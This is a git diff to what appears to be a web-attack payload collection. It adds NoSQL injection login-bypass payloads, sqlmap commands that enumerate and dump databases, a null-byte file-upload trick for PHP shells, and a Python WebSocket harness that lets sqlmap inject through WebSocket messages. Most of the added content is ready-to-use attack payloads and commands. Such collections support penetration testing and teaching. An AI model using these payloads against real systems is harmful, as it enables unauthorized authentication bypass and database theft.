diff --git a/NoSQL injection/README.md b/NoSQL injection/README.md index 811cd3b..e87a921 100644 --- a/NoSQL injection/README.md +++ b/NoSQL injection/README.md @@ -11,9 +11,10 @@ in URL username[$ne]=toto&password[$ne]=toto in JSON -{"username": {"$ne": null}, "password": {"$ne": null} } -{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} } -{"username": {"$gt": undefined}, "password": {"$gt": undefined} } +{"username": {"$ne": null}, "password": {"$ne": null}} +{"username": {"$ne": "foo"}, "password": {"$ne": "bar"}} +{"username": {"$gt": undefined}, "password": {"$gt": undefined}} +{"username": {"$gt":""}, "password": {"$gt":""}} ``` Extract length information @@ -40,6 +41,13 @@ in JSON {"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }} ``` +Extract data with "in" + +````json +{"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}} +``` + + ## Blind NoSQL ```python diff --git a/SQL injection/README.md b/SQL injection/README.md index 3a1b845..5fe5773 100644 --- a/SQL injection/README.md +++ b/SQL injection/README.md @@ -117,6 +117,12 @@ transformed into U+0027 APOSTROPHE (') sqlmap --url="" -p username --user-agent=SQLMAP --random-agent --threads=10 --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs ``` +### Load a request file and use mobile user-agent + +```powershell +sqlmap -r sqli.req --safe-url=http://10.10.10.10/ --mobile --safe-freq=1 +``` + ### Custom injection in UserAgent/Header/Referer/Cookie ```powershell diff --git a/Upload insecure files/README.md b/Upload insecure files/README.md index 809fba8..7ca53b1 100644 --- a/Upload insecure files/README.md +++ b/Upload insecure files/README.md @@ -31,7 +31,7 @@ Double extensions ### Upload tricks -- Null byte (eg: shell.php%00.gif, shell.php%00.png) +- Null byte (eg: shell.php%00.gif, shell.php%00.png), works well against `pathinfo()` - Mime type, change `Content-Type : application/x-php` or `Content-Type : application/octet-stream` to `Content-Type : image/gif` ### Picture upload with LFI diff --git a/Web Sockets/Files/ws-harness.py b/Web Sockets/Files/ws-harness.py new file mode 100644 index 0000000..7e3a2f6 --- /dev/null +++ b/Web Sockets/Files/ws-harness.py @@ -0,0 +1,63 @@ +#!/usr/bin/python +import socket,ssl +from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer +from websocket import create_connection, WebSocket +from urlparse import parse_qs +import argparse +import os + +LOOP_BACK_PORT_NUMBER = 8000 + +def FuzzWebSocket(fuzz_value): + print fuzz_value + ws.send(ws_message.replace("[FUZZ]", str(fuzz_value[0]))) + result = ws.recv() + return result + +def LoadMessage(file): + file_contents = "" + try: + if os.path.isfile(file): + f = open(file,'r') + file_contents = f.read() + f.close() + except: + print ("Error reading file: %s" % file) + exit() + return file_contents + +class myWebServer(BaseHTTPRequestHandler): + + #Handler for the GET requests + def do_GET(self): + qs = parse_qs(self.path[2:]) + fuzz_value = qs['fuzz'] + result = FuzzWebSocket(fuzz_value) + self.send_response(200) + self.send_header('Content-type','text/html') + self.end_headers() + self.wfile.write(result) + return + +parser = argparse.ArgumentParser(description='Web Socket Harness: Use traditional tools to assess web sockets') +parser.add_argument('-u','--url', help='The remote WebSocket URL to target.',required=True) +parser.add_argument('-m','--message', help='A file that contains the WebSocket message template to send. Please place [FUZZ] where injection is desired.',required=True) +args = parser.parse_args() + +ws_message = LoadMessage(args.message) + +ws = create_connection(args.url,sslopt={"cert_reqs": ssl.CERT_NONE},header={},http_proxy_host="", http_proxy_port=8080) + +try: + #Create a web server and define the handler to manage the + #incoming request + server = HTTPServer(('', LOOP_BACK_PORT_NUMBER), myWebServer) + print 'Started httpserver on port ' , LOOP_BACK_PORT_NUMBER + + #Wait forever for incoming http requests + server.serve_forever() + +except KeyboardInterrupt: + print '^C received, shutting down the web server' + server.socket.close() + ws.close() \ No newline at end of file diff --git a/Web Sockets/Images/WebsocketHarness.jpg b/Web Sockets/Images/WebsocketHarness.jpg new file mode 100644 index 0000000..2657d6e Binary files /dev/null and b/Web Sockets/Images/WebsocketHarness.jpg differ diff --git a/Web Sockets/Images/sqlmap.png b/Web Sockets/Images/sqlmap.png new file mode 100644 index 0000000..12b888c Binary files /dev/null and b/Web Sockets/Images/sqlmap.png differ diff --git a/Web Sockets/Images/websocket-harness-start.png b/Web Sockets/Images/websocket-harness-start.png new file mode 100644 index 0000000..22c0081 Binary files /dev/null and b/Web Sockets/Images/websocket-harness-start.png differ diff --git a/Web Sockets/README.md b/Web Sockets/README.md new file mode 100644 index 0000000..088c476 --- /dev/null +++ b/Web Sockets/README.md @@ -0,0 +1,37 @@ +# Web Sockets Attacks + +> The WebSocket protocol allows a bidirectional and full-duplex communication between a client and a server + +Tools: + +- [ws-harness.py](https://gist.githubusercontent.com/mfowl/ae5bc17f986d4fcc2023738127b06138/raw/e8e82467ade45998d46cef355fd9b57182c3e269/ws.harness.py) + +## Summary + +* [Using ws-harness.py](#using-ws-harness-py) + +## Using ws-harness.py + +Start ws-harness to listen on a web-socket, and specify a message template to send to the endpoint. + +```powershell +python ws-harness.py -u "ws://dvws.local:8080/authenticate-user" -m ./message.txt +``` + +The content of the message should contains the **[FUZZ]** keyword. + +```json +{"auth_user":"dGVzda==", "auth_pass":"[FUZZ]"} +``` + +Then you can use any tools against the newly created web service, working as a proxy and tampering on the fly the content of message sent thru the websocket. + +```python +sqlmap -u http://127.0.0.1:8000/?fuzz=test --tables --tamper=base64encode --dump +``` + + +## References + +- [HACKING WEB SOCKETS: ALL WEB PENTEST TOOLS WELCOMED by Michael Fowl | Mar 5, 2019](https://www.vdalabs.com/2019/03/05/hacking-web-sockets-all-web-pentest-tools-welcomed/) +- [Hacking with WebSockets - Qualys - Mike Shema, Sergey Shekyan, Vaagn Toukharian](https://media.blackhat.com/bh-us-12/Briefings/Shekyan/BH_US_12_Shekyan_Toukharian_Hacking_Websocket_Slides.pdf)